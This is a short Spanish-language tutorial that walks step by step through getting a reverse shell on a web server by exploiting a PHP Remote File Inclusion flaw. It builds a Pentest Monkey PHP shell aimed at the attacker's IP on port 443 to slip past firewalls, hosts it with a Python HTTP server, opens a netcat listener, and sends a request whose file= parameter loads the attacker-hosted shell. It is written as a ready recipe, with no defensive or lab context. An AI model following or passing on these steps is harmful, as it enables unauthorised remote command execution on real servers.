CÓMO CONSEGUIR UNA REVERSE SHELL CON UNA VULNERABILIDAD DE RFI y PHP
1. En primer lugar, la URL debe mostrar de la siguiente manera:
[Link]
2. Si agregamos el parámetro ?file= después de esto, o algún otro comando como
search?=, esto significa que podemos manipular las solicitudes GET HTTP
3. Entonces, creamos con nano una reverse shell donde la IP será la de nuestra
máquina, y el puerto de escucha debe ser uno que permita penetrar un firewall, en
este caso, usaremos el puerto 443 HTTPS
4. Creamos la reverse shell con PHP Pentest Monkey, llenamos los datos con nuestra
IP, puerto y guardamos el archivo, como [Link] por ejemplo
5. Ahora, montamos un servidor en python donde alojaremos nuestro archivo. Usamos
el comando
python3 -m [Link] 8000 por ejemplo.
6. Accedemos a localhost:8000, y nos debemos asegurar que ahí esté la reverse shell
que creamos
7. Configuramos un listener como netcat, con el comando
nc -lvnp 443 (verificar que es el usuario ROOT)
8. Ahora realizamos la siguiente solicitud URL
[Link]
* Después de file= se debe colocar la dirección http de nuestro servidor, donde va
nuestra IP, junto al puerto donde montamos el servidor
** Hacemos referencia al archivo [Link], y debe quedarse cargando.
Y LISTO, TENEMOS UNA REVERSE SHELL APROVECHANDO LA VULNERABILIDAD DE EJECUCIÓN
REMOTA DE ARCHIVOS (RFI)